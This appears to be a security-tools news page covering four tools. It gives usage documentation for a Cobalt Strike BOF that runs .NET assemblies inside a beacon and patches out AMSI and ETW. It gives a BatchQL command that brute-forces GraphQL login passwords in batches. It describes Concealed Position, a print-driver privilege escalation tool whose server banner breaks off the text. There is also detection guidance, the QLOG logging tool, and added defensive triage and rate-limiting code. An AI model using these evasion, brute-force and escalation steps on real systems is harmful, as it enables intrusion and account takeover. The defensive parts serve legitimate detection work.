  3. Run inlineExecute-Assembly --dotnetassembly /path/to/assembly.exe for most basic execution (see use cases below for specific flag examples)

Build Your Own

Run the below command inside the src directory via x64 Native Tools Command Prompt for VS 2019

cl.exe /c inlineExecute-Assembly.c /GS- /FoinlineExecute-Assemblyx64.o

Run the below command inside the src directory via x86 Native Tools Command Prompt for VS 2019

cl.exe /c inlineExecute-Assembly.c /GS- /FoinlineExecute-Assemblyx86.o

Flags
--dotnetassembly   Directory path to your assembly **required**
--assemblyargs     Assembly arguments to pass
--appdomain        Change default name of AppDomain sent (default value is totesLegit and is set via the included aggressor script) *Domain always unloaded*
--amsi             Attempts to disable AMSI via in memory patching (If successful AMSI will be disabled for the entire life of process)
--etw              Attempts to disable ETW via in memory patching (If successful ETW will be disabled for the entire life of process unless reverted)
--revertetw        Attempts to disable ETW via in memory patching and then repatches it back to original state
--pipe             Change default name of named pipe (default value is totesLegit and is set via the included aggressor script)
--mailslot         Switches to using mailslots to redirect console output. Changes default name of mailslot (If left blank, default value is totesLegit and is set via the included aggressor script)
--main             Changes entry point to Main() (default value is Main(string[] args))


Use Case

Execute .NET assembly


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe

Use Case

Execute .NET assembly with arguments


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker

Use Case

Execute .NET assembly with arguments and disable AMSI


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi

Use Case

Execute .NET assembly with arguments and disable ETW


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw

Use Case

Execute .NET assembly with arguments and redirect output via mailslots instead of the default named pipe


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --mailslot

Use Case

Execute .NET assembly with arguments and change the default named pipe name set in the aggressor script


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --pipe forRealLegit

Use Case

Execute .NET assembly and change the default app domain set in the aggressor script


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --appdomain forRealLegit

Use Case

Execute .NET assembly with Main() entry point instead of the default Main(string[] args)


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/simpleMain.exe --main

Use Case

Go HAM


Syntax
beacon> inlineExecute-Assembly --dotnetassembly /root/Desktop/Seatbelt.exe --assemblyargs AntiVirus AppLocker --amsi --etw --appdomain forRealLegit --mailslot forRealLegit

Caveats
  1. While I have tried to make this as stable as possible, there are no guarantees that things will never crash and beacons won't die. We don't have the added luxury of fork-and-run, where if something goes wrong our beacon lives. This is the tradeoff with BOFs. With that said, I can't stress enough how important it is that you test your assemblies beforehand to make sure they will work properly with the tool.
  2. Since the BOF is executed in process and takes over the beacon while running, this should be taken into account before it is used for long-running assemblies. If you choose to run something that will take a long time to return results, your beacon will not be available to run more commands until the results come back and your assembly finishes running. This also doesn't adhere to the sleep setting. For example, if your sleep is set to 10 minutes and you run the BOF, you will get results back as soon as the BOF finishes executing.
  3. Unless modifications are made to tools that load PEs in memory (e.g., SafetyKatz), these will most likely kill your beacon. Many of these tools work fine with execute-assembly because they are able to send their console output from the sacrificial process before exiting. When they exit via our in-process BOF, they kill our process, which kills our beacon. These can be modified to work, but I would advise running these types of assemblies via execute-assembly, since other non-OPSEC-friendly things could be loaded into your process that don't get removed.
  4. If your assembly uses Environment.Exit, this will need to be removed, as it will kill the process and the beacon.
  5. Named pipes and mailslots need to be unique. If you don't receive data back and your beacon is still alive, the issue is most likely that you need to select a different named pipe or mailslot name.

Detection

Some detection and mitigation strategies that could be used:

  1. Uses PAGE_EXECUTE_READWRITE when performing AMSI and ETW memory patching. This was done on purpose and should be a red flag as very few programs have memory ranges with the memory protection of PAGE_EXECUTE_READWRITE.
  2. Default name of named pipe created is totesLegit. This was done on purpose and signature detections could be used to flag this.
  3. Default name of mailslot created is totesLegit. This was done on purpose and signature detections could be used to flag this.
  4. Default name of AppDomain loaded is totesLegit. This was done on purpose and signature detections could be used to flag this.
  5. Good tips on detecting malicious use of .NET (by @bohops) here, (by F-Secure) here, and here
  6. Looking for .NET CLR loading into suspicious processes, such as unmanaged processes which should never have the CLR loaded.
  7. Event Tracing here
  8. Looking for other known Cobalt Strike Beacon IOCs or C2 egress/communication IOCs.
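As an added example (not part of inlineExecute-Assembly or its aggressor script), the following Python triages a constructed telemetry feed against the indicators listed above: the default totesLegit pipe, mailslot and AppDomain names, the CLR loading into a process that normally never hosts it, and a PAGE_EXECUTE_READWRITE protection change inside the DLLs the AMSI/ETW patches modify. The record schema, the sample records, the list of unmanaged host processes and the amsi.dll/ntdll.dll patch-target list are assumptions of this example, not fields of any real product; map them onto your own Sysmon, ETW or EDR events.

```python
"""Triage constructed process telemetry against the inlineExecute-Assembly
indicators listed above. Added example; the record schema is made up."""
from collections import defaultdict
from dataclasses import dataclass

# Default object names the BOF uses unless the operator overrides them (from the page).
DEFAULT_NAMES = {"totesLegit"}

# Processes that should never host the CLR in this environment (assumption; tune locally).
UNMANAGED_HOSTS = {"notepad.exe", "svchost.exe", "explorer.exe", "lsass.exe", "spoolsv.exe"}

# CLR runtime images for the two versions the page names: v2.0.50727 and v4.0.30319.
CLR_IMAGES = {"mscorwks.dll", "clr.dll"}

# Modules the in-memory AMSI and ETW patches modify (assumption based on the
# referenced research); an RWX region inside them is a strong signal.
PATCH_TARGETS = {"amsi.dll", "ntdll.dll"}

PAGE_EXECUTE_READWRITE = 0x40


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def _leaf(object_name: str) -> str:
    """'\\\\.\\pipe\\totesLegit' -> 'totesLegit' (also works for mailslot paths)."""
    return object_name.rsplit("\\", 1)[-1]


def triage(events: list[dict]) -> list[Finding]:
    """Apply the four indicator rules to a list of telemetry records."""
    findings: list[Finding] = []
    for ev in events:
        kind, pid = ev["kind"], ev["pid"]
        if kind in ("pipe_created", "mailslot_created") and _leaf(ev["name"]) in DEFAULT_NAMES:
            findings.append(Finding(pid, "default-object-name", ev["name"]))
        elif kind == "appdomain_load" and ev["name"] in DEFAULT_NAMES:
            findings.append(Finding(pid, "default-appdomain-name", ev["name"]))
        elif kind == "image_load":
            image, proc = ev["image"].lower(), ev["process"].lower()
            if image in CLR_IMAGES and proc in UNMANAGED_HOSTS:
                findings.append(Finding(pid, "clr-in-unmanaged-process", f"{proc} loaded {image}"))
        elif kind == "protect_change":
            if ev["protection"] == PAGE_EXECUTE_READWRITE and ev["module"].lower() in PATCH_TARGETS:
                findings.append(Finding(pid, "rwx-in-patch-target", f"{ev['module']} @ {ev['address']:#x}"))
    return findings


def score_by_pid(findings: list[Finding]) -> dict[int, int]:
    """Number of distinct rules that fired per process. Several firing in one PID is
    the combination this BOF produces; a single one is usually noise."""
    rules = defaultdict(set)
    for f in findings:
        rules[f.pid].add(f.rule)
    return {pid: len(r) for pid, r in rules.items()}


# Constructed records: PID 4242 mimics the BOF running with default names inside
# notepad.exe; PID 1000 is ordinary PowerShell activity for contrast.
SAMPLE_EVENTS = [
    {"kind": "pipe_created", "pid": 4242, "name": "\\\\.\\pipe\\totesLegit"},
    {"kind": "pipe_created", "pid": 1000, "name": "\\\\.\\pipe\\PSHost.1234.5678"},
    {"kind": "appdomain_load", "pid": 4242, "name": "totesLegit"},
    {"kind": "image_load", "pid": 4242, "process": "notepad.exe", "image": "clr.dll"},
    {"kind": "image_load", "pid": 1000, "process": "powershell.exe", "image": "clr.dll"},
    {"kind": "protect_change", "pid": 4242, "module": "amsi.dll",
     "address": 0x7FF8A0C01000, "protection": PAGE_EXECUTE_READWRITE},
    {"kind": "protect_change", "pid": 1000, "module": "jitted.dll",
     "address": 0x1F00000, "protection": 0x20},
]

if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for f in hits:
        print(f"pid={f.pid} {f.rule}: {f.detail}")
    print(score_by_pid(hits))
```

The point of score_by_pid is correlation: any one of these rules fires occasionally on legitimate software (a managed add-in in an unexpected host, a JIT that uses RWX pages), but all four inside one process, with the operator-default names untouched, is close to a signature for this tool as shipped.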


QLOG - Windows Security Logging

19 September 2021 at 11:30
By: Zion3R


QLOG provides enriched event logging for security-related events on Windows-based systems. It is under heavy development and currently in alpha state. QLOG doesn't use API hooks and it doesn't require a driver to be installed on the target system; QLOG only uses ETW to retrieve its telemetry. Currently QLOG supports "process create" events only, but other enriched events will follow soon. QLOG runs as a Windows Service, but can also run in console mode if you want to stream the enriched events to the console directly.


How does it work

QLOG reads from ETW, enriches events and writes the enriched events to the Event Channel "QLOG". It creates and uses a new event source named "QMonitor" to write to the Windows Eventlog.

Here is the sequence of event processing:

  • Create ETW session & Subscribe to relevant kernel and userland ETW providers
  • Read Events from ETW providers
  • Enrich Events
  • Write enriched events to eventlog channel QLOG

Development & License

QLOG is being developed by threathunters.io community and will be open sourced once it reaches production grade maturity.


Why we created QLOG

Sysmon does a great job, but we wanted to create a tool which is open source and doesn't require drivers to be installed on target systems. Also, Sysmon is NOT SUPPORTED by Microsoft at all. So, if you run into problems in prod, you're on your own. Sure, QLOG doesn't have support either, but it will be open sourced, so we can fix issues with the power of the security community and develop new features based on the requirements of the community.


Usage & install

QLOG requires .NET Framework >=4.7.2 to be installed.

To run in interactive console mode, just run

qlog.exe

To install / deinstall as Windows service, run:

#install service
qlog.exe -i

#deinstall service
qlog.exe -u

Do you want to contribute?

Please see https://threathunters.io/ on how to join threathunters.io community.


Example output of enriched PROCESS CREATE events
{
"EventGuid": "68795fe8-67e7-410b-a5c0-8364746d7ffe",
"StartTime": "2021-07-11T11:06:56.9621746+02:00",
"QEventID": 100,
"QType": "Process Create",
"Username": "TESTOS\\TESTUSER",
"Imagefilename": "TEAMS.EXE",
"KernelImagefilename": "TEAMS.EXE",
"OriginalFilename": "TEAMS.EXE",
"Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
"PID": 21740,
"Commandline": "\"C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe\" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1668,499009601563875864,12511830007210419647,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=de --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=\"C:\\Users \\jocke",
"Modulecount": 41,
"TTPHash": "42AC63285408F5FD91668B16F8E9157FD97046AB63E84117A14E31A188DDC62F",
"Imphash": "F14F00FA1D4C82B933279C1A28957252",
"sha256": "155625190ECAA90E596CB258A07382184DB738F6EDB626FEE4B9652FA4EC1CC2",
"md5": "9453BC2A9CC489505320312F4E6EC21E",
"sha1": "7219CB54AC535BA55BC1B202335A6291FDC2D76E",
"ProcessIntegrityLevel": "None",
"isOndisk": true,
"isRunning": true,
"Signed": "Signature valid",
"AuthenticodeHash": "B8AD58EE5C35B3F80C026A318EEA34BABF6609C077CB3D45AEE69BF5C9CF8E11",
"Signatures": [
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:24:20",
"NotAfter": "02.12.2021 22:24:20",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8C15B4C98AD91E051EE5AF5F524A8729050B2A2",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:3BBD-E338-E9A1, OU=Microsoft America Operations, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "12.11.2020 19:26:02",
"NotAfter": "11.02.2022 19:26:02",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8220CE2AAD2073A9C8CD78752775E29782AABE8",
"Timestamp": "15.06.2021 00:39:50 +02:00"
}
]
},
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:31:47",
"NotAfter": "02.12.2021 22:31:47",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "C774204049D25D30AF9AC2F116B3C1FB88EE00A4",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:F87A-E374-D7B9, OU=Microsoft Operations Puerto Rico, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "14.01.2021 20:02:23",
"NotAfter": "11.04.2022 21:02:23",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "ED2C601EDD49DD2A934D2AB32DCACC19940161EF",
"Timestamp": "15.06.2021 00:39:53 +02:00"
}
]
}
],
"ParentProcess": {
"EventGuid": null,
"StartTime": "2021-07-11T09:54:28.9558001+02:00",
"QEventID": 100,
"QType": "Process Create",
"Username": "TESTOS\\TESTUSER",
"Imagefilename": "",
"KernelImagefilename": "",
"OriginalFilename": "TEAMS.EXE",
"Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe",
"PID": 16232,
"Commandline": "C:\\Users\\TESTUSER\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe ",
"Modulecount": 162,
"TTPHash": "",
"Imphash": "F14F00FA1D4C82B933279C1A28957252",
"sha256": "155625190ECAA90E596CB258A07382184DB738F6EDB626FEE4B9652FA4EC1CC2",
"md5": "9453BC2A9CC489505320312F4E6EC21E",
"sha1": "7219CB54AC535BA55BC1B202335A6291FDC2D76E",
"ProcessIntegrityLevel": "Medium",
"isOndisk": true,
"isRunning": true,
"Signed": "Signature valid",
"AuthenticodeHash": "B8AD58EE5C35B3F80C026A318EEA34BABF6609C077CB3D45AEE69BF5C9CF8E11",
"Signatures": [
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:24:20",
"NotAfter": "02.12.2021 22:24:20",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8C15B4C98AD91E051EE5AF5F524A8729050B2A2",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:3BBD-E338-E9A1, OU=Microsoft America Operations, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "12.11.2020 19:26:02",
"NotAfter": "11.02.2022 19:26:02",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "E8220CE2AAD2073A9C8CD78752775E29782AABE8",
"Timestamp": "15.06.2021 00:39:50 +02:00"
}
]
},
{
"Subject": "CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "15.12.2020 22:31:47",
"NotAfter": "02.12.2021 22:31:47",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "C774204049D25D30AF9AC2F116B3C1FB88EE00A4",
"TimestampSignatures": [
{
"Subject": "CN=Microsoft Time-Stamp Service, OU=Thales TSS ESN:F87A-E374-D7B9, OU=Microsoft Operations Puerto Rico, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"Issuer": "CN=Microsoft Time-Stamp PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
"NotBefore": "14.01.2021 20:02:23",
"NotAfter": "11.04.2022 21:02:23",
"DigestAlgorithmName": "SHA256",
"Thumbprint": "ED2C601EDD49DD2A934D2AB32DCACC19940161EF",
"Timestamp": "15.06.2021 00:39:53 +02:00"
}
]
}
],
"ParentProcess": null
}
}
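As an added example, not part of QLOG, here is a small consumer for the enriched event shape shown above and for the read-enrich-write pipeline described under "How does it work": it takes one PROCESS CREATE event with its ParentProcess chain and tags each process with the things a hunter checks first: whether the Authenticode signature verified, whether the image is still on disk, whether the on-disk name disagrees with the version-resource OriginalFilename, whether the signer is on an allow-list, and whether the child runs at a higher integrity level than its parent. The sample event is constructed and trimmed to the fields the checks use; field names follow the page, while the tag strings, the trusted-signer list and the assumption that any Signed value other than "Signature valid" means unverified are mine.

```python
"""Tag QLOG-style enriched process-create events. Added example, not QLOG code."""
import json
import re

# Signer CNs accepted without comment (assumption; extend per environment).
TRUSTED_SIGNER_CN = {"Microsoft Corporation", "Microsoft Windows"}

# Windows integrity levels, low to high; "None" in QLOG output means unknown.
INTEGRITY_RANK = {"Untrusted": 0, "Low": 1, "Medium": 2, "High": 3, "System": 4}


def _subject_cn(subject: str) -> str:
    m = re.match(r"CN=([^,]+)", subject)
    return m.group(1).strip() if m else ""


def assess(ev: dict) -> list[str]:
    """Tags for a single event, independent of its parent (empty list = nothing odd)."""
    tags: list[str] = []
    if ev.get("Signed") != "Signature valid":          # assumption: anything else is unverified
        tags.append("signature-not-verified")
    if not ev.get("isOndisk", True):
        tags.append("image-not-on-disk")
    image, original = ev.get("Imagefilename", ""), ev.get("OriginalFilename", "")
    if image and original and image.lower() != original.lower():
        tags.append("renamed-binary")                  # name on disk != version-resource name
    for sig in ev.get("Signatures", []):
        cn = _subject_cn(sig.get("Subject", ""))
        if cn not in TRUSTED_SIGNER_CN:
            tags.append(f"untrusted-signer:{cn or 'unknown'}")
    return tags


def walk(ev: dict) -> dict[int, list[str]]:
    """Assess an event and every ancestor in its ParentProcess chain, keyed by PID."""
    out: dict[int, list[str]] = {}
    while ev:
        tags = assess(ev)
        parent = ev.get("ParentProcess")
        if parent:
            child_il = INTEGRITY_RANK.get(ev.get("ProcessIntegrityLevel"))
            parent_il = INTEGRITY_RANK.get(parent.get("ProcessIntegrityLevel"))
            if child_il is not None and parent_il is not None and child_il > parent_il:
                tags.append("integrity-above-parent")   # child gained rights its parent lacks
        out[ev["PID"]] = tags
        ev = parent
    return out


# Constructed sample in the page's JSON shape: an unsigned, renamed, already-deleted
# child at High integrity, spawned by a signed Medium-integrity parent.
SAMPLE_JSON = r"""
{
  "EventGuid": "00000000-0000-4000-8000-000000000001",
  "StartTime": "2021-07-11T11:06:56.9621746+02:00",
  "QEventID": 100,
  "QType": "Process Create",
  "Username": "TESTOS\\TESTUSER",
  "Imagefilename": "UPDATER.EXE",
  "KernelImagefilename": "UPDATER.EXE",
  "OriginalFilename": "CALC.EXE",
  "Fullpath": "C:\\Users\\TESTUSER\\AppData\\Local\\Temp\\updater.exe",
  "PID": 5100,
  "Commandline": "\"C:\\Users\\TESTUSER\\AppData\\Local\\Temp\\updater.exe\" /quiet",
  "ProcessIntegrityLevel": "High",
  "isOndisk": false,
  "isRunning": true,
  "Signed": "Signature invalid",
  "Signatures": [
    {"Subject": "CN=Example Vendor, O=Example Vendor Ltd, C=US",
     "Issuer": "CN=Example Issuing CA, O=Example PKI, C=US"}
  ],
  "ParentProcess": {
    "EventGuid": null,
    "StartTime": "2021-07-11T09:54:28.9558001+02:00",
    "QEventID": 100,
    "QType": "Process Create",
    "Username": "TESTOS\\TESTUSER",
    "Imagefilename": "EXPLORER.EXE",
    "OriginalFilename": "EXPLORER.EXE",
    "Fullpath": "C:\\Windows\\explorer.exe",
    "PID": 4321,
    "ProcessIntegrityLevel": "Medium",
    "isOndisk": true,
    "isRunning": true,
    "Signed": "Signature valid",
    "Signatures": [
      {"Subject": "CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US",
       "Issuer": "CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US"}
    ],
    "ParentProcess": null
  }
}
"""
SAMPLE_EVENT = json.loads(SAMPLE_JSON)

if __name__ == "__main__":
    for pid, tags in walk(SAMPLE_EVENT).items():
        print(pid, tags or "clean")
```

Because QLOG nests the parent inside the child, one event is enough to compare integrity levels across the process tree without a second lookup; the same walk can be pointed at a stream of events read from the QLOG channel.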


BatchQL - GraphQL Security Auditing Script With A Focus On Performing Batch GraphQL Queries And Mutations

18 September 2021 at 20:30
By: Zion3R


BatchQL is a GraphQL security auditing script with a focus on performing batch GraphQL queries and mutations. This script is not complex, and we welcome improvements.

When exploring the problem space of GraphQL batching attacks, we found a few blog posts on the internet but no tool to perform GraphQL batching attacks.

GraphQL batching attacks can be quite serious depending on the functionalities implemented. For example, imagine a password reset functionality which expects a 4 digit pin that was sent to your email. With this tool, you could attempt all 10k pin attempts in a single GraphQL query. This may bypass any rate limiting or account lockouts depending on the implementation details of the password reset flow.


Detections

This tool is capable of detecting the following:

  • Introspection query support
  • Schema suggestions detection
  • Potential CSRF detection
  • Query name based batching
  • Query JSON list based batching

Attacks

Currently, this tool only supports sending JSON list based queries for batching attacks. It supports scenarios where the variables are embedded in the query, or where they are provided in the JSON input.
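The server-side counterpart to the two batching forms described above, as an added example that is not part of BatchQL: a request pre-filter that counts how many root operations a body carries, whether they arrive as a JSON list (one query per element) or as aliased root fields inside a single document, and rejects bodies over a limit. The sample bodies and the limit of 10 are constructed. The counter is a small hand scanner that ignores strings, comments, arguments and directives and sees through inline fragments, but it does not expand named fragments (each spread counts as one); a production deployment would compute the same count from the parsed AST inside its GraphQL server.

```python
"""Batch-size pre-filter for GraphQL request bodies. Added example, not BatchQL code."""
import json
import re

MAX_ROOT_OPERATIONS = 10          # assumption: policy knob, tune per API

_NAME = re.compile(r"[_A-Za-z][_0-9A-Za-z]*")


def _strip(doc: str) -> str:
    """Blank out block strings, strings and comments so braces inside them are ignored."""
    doc = re.sub(r'"""[\s\S]*?"""', '""', doc)
    doc = re.sub(r'"(?:\\.|[^"\\\n])*"', '""', doc)
    return re.sub(r"#[^\n]*", "", doc)


def count_root_fields(doc: str) -> int:
    """Number of root-level selections in a document; aliases count separately."""
    doc = _strip(doc)
    braces: list[bool] = []   # one entry per open '{'; True = belongs to an inline fragment
    paren = 0                 # inside (...) we are in arguments or variable definitions
    count = 0
    prev = ""                 # previous significant token: 'name', ':', '@', '.', or a bracket
    frag_pending = False
    i = 0
    while i < len(doc):
        ch = doc[i]
        if ch in "{}()":
            if ch == "{":
                braces.append(frag_pending)
                frag_pending = False
            elif ch == "}":
                braces.pop()
            else:
                paren += 1 if ch == "(" else -1
            prev = ch
            i += 1
            continue
        m = _NAME.match(doc, i)
        if m:
            name = m.group(0)
            at_root = paren == 0 and sum(1 for f in braces if not f) == 1
            if at_root:
                if prev == ".":                 # after "...": a fragment spread
                    if name == "on":            # inline fragment: its braces stay transparent
                        frag_pending = True
                        prev = ":"              # skip the type condition that follows
                        i = m.end()
                        continue
                    count += 1                  # named spread: at least one hidden field
                elif prev not in (":", "@"):    # not the field behind an alias, not a directive
                    count += 1
            prev = "name"
            i = m.end()
            continue
        if not ch.isspace() and ch != ",":
            prev = ch
        i += 1
    return count


def count_operations(body: str) -> int:
    """Root operations in an HTTP body: JSON-list batching sums the elements,
    alias batching counts the root fields of the single document."""
    payload = json.loads(body)
    if isinstance(payload, list):
        return sum(count_root_fields(op.get("query", "")) for op in payload)
    return count_root_fields(payload.get("query", ""))


def should_reject(body: str, limit: int = MAX_ROOT_OPERATIONS) -> bool:
    return count_operations(body) > limit


# Constructed request bodies: one normal query, one alias-batched document,
# and one JSON-list batch.
SINGLE = json.dumps({"query": "query { me { id } }"})
ALIAS_BATCH = json.dumps({"query": "query { " + " ".join(
    f"p{i}: product(id: {i}) {{ price }}" for i in range(20)) + " }"})
LIST_BATCH = json.dumps([
    {"query": "query($id: Int!) { product(id: $id) { price } }", "variables": {"id": i}}
    for i in range(12)])

if __name__ == "__main__":
    for label, body in (("single", SINGLE), ("alias batch", ALIAS_BATCH), ("list batch", LIST_BATCH)):
        print(f"{label}: {count_operations(body)} root operations, reject={should_reject(body)}")
```

Counting both forms with one number matters: a limit on list length alone is bypassed by aliases, and a limit on aliases alone is bypassed by a list of single-alias queries, which is exactly the gap the "Query name based" and "Query JSON list based" checks in the enumeration output probe for.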


Usage

Enumeration
❯ python batch.py -e http://re.local:5000/graphiql -p localhost:8080

Schema suggestions enabled. Use Clairvoyance to recover schema: https://github.com/nikitastupin/clairvoyance
CSRF GET based successful. Please confirm that this is a valid issue.
CSRF POST based successful. Please confirm that this is a valid issue.
Query name based batching: GraphQL batching is possible... preflight request was successful.
Query JSON list based batching: GraphQL batching is possible... preflight request was successful.
Most provide query, wordlist, and size to perform batching attack.

Batching Attacks
  1. Save a file that contains your GraphQL query, e.g. acc-login.txt:
mutation emailLoginRemembered($loginInput: InputRememberedEmailLogin!) {
  emailLoginRemembered(loginInput: $loginInput) {
    authToken {
      accessToken
      __typename
    }
    userSessionResponse {
      userToken
      userIdentity {
        userId
        identityType
        verified
        onboardingStatus
        registrationReferralCode
        userReferralInfo {
          referralCode {
            code
            valid
            __typename
          }
          __typename
        }
        __typename
      }
      __typename
    }
    __typename
  }
}
  2. Run the following command to run a GraphQL batching attack:
❯ python batch.py --query acc-login.txt --wordlist passwords.txt -v '{"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}' --size 100 -e http://re.local:5000/graphiql -p localhost:8080

The above command does the following:

  • Specifies a query from a local file --query acc-login.txt.
  • Specifies a wordlist --wordlist passwords.txt
  • Specifies the variable input with the replacement identifier -v {"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}
  • Specifies the batch size --size 100
  • Specifies the endpoint -e http://re.local:5000/graphiql
  • Specifies a proxy -p localhost:8080



Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool

18 September 2021 at 11:30
By: Zion3R


Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the as designed package point and print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.


What exploits are available

Concealed Position offers four exploits - all with equally dumb names:

The exploits are neat because, besides SLASHINGDAMAGE, they will continue working even after the issues are patched. The only mechanism Windows has to stop users from using old drivers is to revoke the driver's certificate - something that is not(?) historically done.


But which exploit should I use?!

Probably ACIDDAMAGE. RADIANTDAMAGE and POISONDAMAGE are race conditions (to overwrite a DLL), and SLASHINGDAMAGE, hopefully, is patched almost everywhere.


How does it work?

Concealed Position has two parts. An evil printer and a client. The client reaches out to the server, grabs a driver, gets the driver stored in the driver store, installs the printer, and exploits the install process. Easy! In MSAPI speak, the attack goes something like this:

Stage 1: Stage the driver in the driver store
client to server: GetPrinterDriver
server to client: Response with driver

Stage 2: Install the driver from the driver store
client: InstallPrinterDriverFromPackage

Stage 3: Add a local printer (exploitation stage)
client: Add printer

It is important to note that SLASHINGDAMAGE doesn't actually work like that though. SLASHINGDAMAGE is an implementation of the evil printer attack described at DEFCON 28 (2020) and has long since been patched. I just so happen to enjoy the attack (it sparked the rest of this development) and figured I'd leave the exploit in my evil server... as confusing as that may be.


Is this a Windows vulnerability?

Arguably, yes. The driver store is a "trusted collection of ... third-party driver packages" that requires administrator access to modify. Using GetPrinterDriver a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.

Microsoft seemed to agree when they issued CVE-2021-34481.

Although... it's arguable that this is simply a feature of the system and not a vulnerability at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.


Which versions of Windows are affected by CVE-2021-34481?

At least Windows 8.1 and above.


How do I use these tools?

Simple! So simple there will be many paragraphs to describe it!


CP Server

First, let's look at cp_server's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

CLI options:
-h, --help Display the help message
-e, --exploit arg The exploit to use
-c, --cabs arg (=.\cab_files) The location of the cabinet files

Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE
SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Above you can see the server requires two options:

  1. The exploit to configure the printer for
  2. A path to this repository's cab_files (.\cab_files\ is the default)

For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
